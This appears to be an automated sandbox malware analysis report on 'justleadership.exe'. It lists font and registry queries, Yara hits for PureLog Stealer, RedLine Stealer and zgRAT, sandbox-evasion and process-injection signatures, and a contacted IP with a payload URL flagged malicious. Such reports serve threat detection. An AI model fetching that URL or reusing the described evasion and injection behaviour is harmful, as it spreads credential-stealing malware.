Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\coure.fon VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\sserife.fon VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\sseriff.fon VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\smalle.fon VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\justleadership.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2147404072.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: Process Memory Space: justleadership.exe PID: 7144, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE

Remote Access Functionality
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2147404072.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: Process Memory Space: justleadership.exe PID: 7144, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1534477 Sample: justleadership.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 21 Malicious sample detected (through community Yara rule) 2->21 23 Antivirus / Scanner detection for submitted sample 2->23 25 Multi AV Scanner detection for submitted file 2->25 27 10 other signatures 2->27 7 justleadership.exe 15 2 2->7         started        process3 dnsIp4 19 91.208.206.5, 49730, 80 ALEXHOSTMD unknown 7->19 29 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->29 31 Injects a PE file into a foreign processes 7->31 11 justleadership.exe 4 7->11         started        signatures5 process6 file7 17 C:\Users\user\...\justleadership.exe.log, ASCII 11->17 dropped 33 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->33 15 conhost.exe 11->15         started        signatures8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.208.206.5
 unknown unknown
200019 ALEXHOSTMD false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://91.208.206.5/mime/Fwkbz.pdf true
    		unknown